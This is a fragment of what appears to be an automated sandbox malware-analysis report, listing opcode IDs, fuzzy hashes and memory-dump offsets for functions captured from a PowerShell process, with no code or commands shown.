                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ccde5c6631c369dd2b05d3c2b27b6c5f59cc38a5e70cfaf2bd5e4e98a674e01
                                                                                              • Instruction ID: d39f4042aeffa318ac3ed461a69fdf8eb242f370478209bc2b529b9e74c4ea9a
                                                                                              • Opcode Fuzzy Hash: 1ccde5c6631c369dd2b05d3c2b27b6c5f59cc38a5e70cfaf2bd5e4e98a674e01
                                                                                              • Instruction Fuzzy Hash: 4F2103B5D052589FCB50CF99D884BDEFBF4FB89314F14816AE808BB241D774A944CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1caaef02d13e6a07c327e4a44ad0d371cd6abe65a456f7be2ceb4f7530175d80
                                                                                              • Instruction ID: f039f472f0c240e2f13c2bf931668370075fcdf1f1b0616bb70c3604c52f0752
                                                                                              • Opcode Fuzzy Hash: 1caaef02d13e6a07c327e4a44ad0d371cd6abe65a456f7be2ceb4f7530175d80
                                                                                              • Instruction Fuzzy Hash: 6A2106B5D052589FCB10CFA9E885BDEFBF4FB48314F14816AD808BB241D774A944CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c10aacffdb56f5e48a696105601e7767b490e17ba487be5b1207b8a89c3bc338
                                                                                              • Instruction ID: 5184c57db6974f1059f1ff39864e14ca0901f6f918f3a634dffdda6e777bd2c5
                                                                                              • Opcode Fuzzy Hash: c10aacffdb56f5e48a696105601e7767b490e17ba487be5b1207b8a89c3bc338
                                                                                              • Instruction Fuzzy Hash: D201B521B182515BFF24DA7BC8083BE6AF95B49314F4C04B99946E7EC1EEB9E8C08351
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dff43cdfce788a1bc14153becf7ee00253e5c6e9875b6750bcaf59aecd2809da
                                                                                              • Instruction ID: 8c1f6bc46692c464e59191b04049c9e652845946d03c552b3287d8841c43967a
                                                                                              • Opcode Fuzzy Hash: dff43cdfce788a1bc14153becf7ee00253e5c6e9875b6750bcaf59aecd2809da
                                                                                              • Instruction Fuzzy Hash: AA11227291C3908BD716CB28D9553A9BFE49F46215F0C84EAD889CB182D6388924DBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 225a966742d31a97bb540f161f02bc57060a0c4dae3bde761e6cbbbbc68d439c
                                                                                              • Instruction ID: 142e0c10083d6e343d335aad28913b42933b006351712210a403de8d6197aad5
                                                                                              • Opcode Fuzzy Hash: 225a966742d31a97bb540f161f02bc57060a0c4dae3bde761e6cbbbbc68d439c
                                                                                              • Instruction Fuzzy Hash: 4711E174D006888BDB14DF61C859BEEBBF1BF44345F0448A8C401BA190DF795A80DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d49f9eae5353ad58d053b686f4310fabf416d9d311d0b2411fe2fc8204788fca
                                                                                              • Instruction ID: f981aa9f75dc9122e51a55591b39235130b52b27530414cd85af38ed05d0e6b6
                                                                                              • Opcode Fuzzy Hash: d49f9eae5353ad58d053b686f4310fabf416d9d311d0b2411fe2fc8204788fca
                                                                                              • Instruction Fuzzy Hash: 87F06D3A3146114FC784EBBCD494A6E3BE2DF89725B0245ADD116CB3E0DE25DC418BD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edeec8f624ee5f5482f7e1cd4a8f96f2fc7cc6ab1a8e343f483d9700f3ff3e69
                                                                                              • Instruction ID: c437072e063e76ff05b2904b5ed008aa673f6da43aeb56a748ea84aedf316890
                                                                                              • Opcode Fuzzy Hash: edeec8f624ee5f5482f7e1cd4a8f96f2fc7cc6ab1a8e343f483d9700f3ff3e69
                                                                                              • Instruction Fuzzy Hash: F1F02EAB70C350AFC32145AD5E54676AFBD9F872A1B0D00E7F584CF292D51D88048371
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 778ad194ebe3245bf27ae9e52527fcac09095a845a24c6989eb5df3e7c607604
                                                                                              • Instruction ID: 1fdfaa4dd23127fcaecec4d4ecf97324a8fb8eb4187932f23e166e9ac6e4b889
                                                                                              • Opcode Fuzzy Hash: 778ad194ebe3245bf27ae9e52527fcac09095a845a24c6989eb5df3e7c607604
                                                                                              • Instruction Fuzzy Hash: A8F0F8393106154FCA88EBBDC454A2E77E6EFC971574144BDE216CB3A0DE25DC018BE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f5847a2e8997f5d9942fd4e25fdd47a9cc65d7cce05353bf5c903dd08a54d592
                                                                                              • Instruction ID: f0899136a2b33ac3bc7faf4a363b6afb90fe419ebf55fe05de2b1c34a44f44fa
                                                                                              • Opcode Fuzzy Hash: f5847a2e8997f5d9942fd4e25fdd47a9cc65d7cce05353bf5c903dd08a54d592
                                                                                              • Instruction Fuzzy Hash: 26F05E70C082998BCF15CFB9C4142DDBFB1BF49219F1882AEC564A7691E73A4043CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86a043050c9da497bd4225a867e6e74b31b5e23fda67a4a36045ed08d1f1c521
                                                                                              • Instruction ID: 27ca85047a6530ba0370557678d26c87763aa8dea6d170e4f95168574e2efc30
                                                                                              • Opcode Fuzzy Hash: 86a043050c9da497bd4225a867e6e74b31b5e23fda67a4a36045ed08d1f1c521
                                                                                              • Instruction Fuzzy Hash: 60E06D359142905FDB021770EC2D7B67FB6EF89215F084492E58582256EA29496AC780
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Non-executed Functions